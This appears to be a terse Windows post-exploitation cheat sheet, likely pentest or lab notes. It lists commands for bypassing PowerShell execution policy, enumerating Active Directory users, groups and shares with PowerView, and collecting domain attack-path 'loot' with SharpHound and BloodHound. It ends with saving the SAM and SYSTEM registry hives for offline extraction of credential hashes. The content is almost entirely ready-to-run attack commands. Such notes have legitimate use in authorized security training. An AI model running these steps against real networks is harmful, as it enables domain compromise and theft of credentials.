# Windows Post Exploitation

# Powerview

Powerview is a script from powershell empire that can be used for enumerating a domain after getting a shell in the system.

powershell -ep bypass                               # bypass execution policy
. .\Downloads\PowerView.ps1                         # load PowerView
Get-NetUser | select cn                             # Enumerate the domain users
Get-NetGroup -GroupName *admin*                     # Enumerate admin groups  
Invoke-ShareFinder                                  # Enumerate shares
Get-NetComputer -fulldata | select operatingsystem  # Enumerate Operating systems

cheatsheet: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

# Sharphound

powershell -ep bypass                              # bypass execution policy
. .\Downloads\SharpHound.ps1                       # 
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip    

# Bloodhound

on remote box

powershell -ep bypass same as with PowerView
.\Downloads\SharpHound.ps1    
# Get "loot"
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
# move loot.zip to local box and open with bloodhound    

on local box

sudo neo4j console              # on local box, use default creds neo4j:neoj
http://localhost:7474/browser/  #navigate here to change default creds otherwise bloodhound wont let you in.
bloodhound 
#NOTE: some versions of bloodhound are buggy and require you to drag the loot.zip folder onto the application to work

# Download SAM and System from registry

reg save HKLM\SAM SAM
reg save HKLM\System System